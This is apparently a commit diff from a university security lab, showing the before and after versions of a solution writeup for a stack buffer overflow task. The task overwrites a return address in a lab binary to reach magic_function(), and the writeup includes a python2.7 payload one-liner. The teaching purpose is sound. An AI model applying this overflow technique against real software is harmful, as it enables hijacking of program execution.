labs/lab-10/tasks/overwrite-ret-addr/solution/README.md, before:

---
nav_order: 1
parent: 'Task: Overwrite Return Address'
---

# Writeup

- First use this command to scan the executable:

> ```Bash
> objdump -M intel -d break_this
> ```

- The `main()` function only calls `read_buffer()`.
- This function reads the length of a buffer from standard input into a variable `n`.
- Then it reads the buffer itself (`char buffer[64]`).
- Because `fgets()` reads at most `n - 1` characters, we can set `n` to a value bigger than the length of the buffer, so an overflow may be possible.
- We will set `n` to a large enough value: `100`

- `magic_function()` starts at address `0x08048596`
- From the first 4 lines from `read_buffer()` we get that: `ebp` and `edi` get pushed on the stack, then the stack is extended by `0x54` = `84`
- So we must print `88 + 4 + 4 = 92` dummy characters `A` and then the address of `magic_function()` in little-endian encoding

For further explanation:

```C
int n;                                          // 4 bytes
unsigned int disorienting_var = 0xDEADBEEF;     // 4 bytes
char buffer[64] = "\0";                         // 64 bytes
size_t i, len;                                  // 16 bytes (8 each one)
```

Sum that up and add another 4 for `ebp` => 92

``` Bash
python2.7 -c 'print "100\n" + "A" * 92 + "\x96\x85\x04\x08"' > payload
```

Commit message:

labs/lab-10: Add checker infrastructure
- Add for each task a directory named `tests/`.
- Add for each task a specified checker in directory tests.
- Add for each task an `exploit.py` file with some `TODO`s.
- Add instructions in the READMEs about completing `exploit.py` TODOs and
running `make check` in `tests/` for displaying the results.
- Add some detailed explanations in the README files.
- Delete the `exploit.py` files from the `stack-buffer` directory.
- Add more detailed tests for the `stack_buffer` exercise.

Fixes #43

Signed-off-by: Alexandru Braslasu <alex.braslasu24@gmail.com>
Signed-off-by: Teodor Dutu <teodor.dutu@gmail.com>

labs/lab-10/tasks/overwrite-ret-addr/solution/README.md, after:

---
nav_order: 1
parent: 'Task: Overwrite Return Address'
---

# Writeup

First use this command to scan the executable:

> ```Bash
> objdump -M intel -d break_this
> ```

- The `main()` function only calls `read_buffer()`.
- This function reads the length of a buffer from standard input into a variable `n`.
- Then it reads the buffer itself (`char buffer[64]`).
- Because `fgets()` reads at most `n - 1` characters, we can set `n` to a value bigger than the length of the buffer, so an overflow may be possible.
- We will set `n` to a large enough value: `100`
- `magic_function()` starts at address `0x080491d6`
- We see that the buffer passed where `fgets()` reads starts at `ebp - 0x58`.
- At the address pointed by `ebp` we find the saved `ebp` which we must skip, followed by the return address that we need to overwrite.
- So we must use `0x58 + 4 = 92` dummy characters `A` and then the address of `magic_function()` in little-endian encoding.

We can find the address of the `magic_function()` using this command:

```console
student@hsi:/.../overwrite-ret-addr/support$ nm break_this | grep magic_function
080491d6 T magic_function
```

``` Bash
python2.7 -c 'print "100\n" + "A" * 92 + "\xd6\x91\x04\x08"' > payload
```
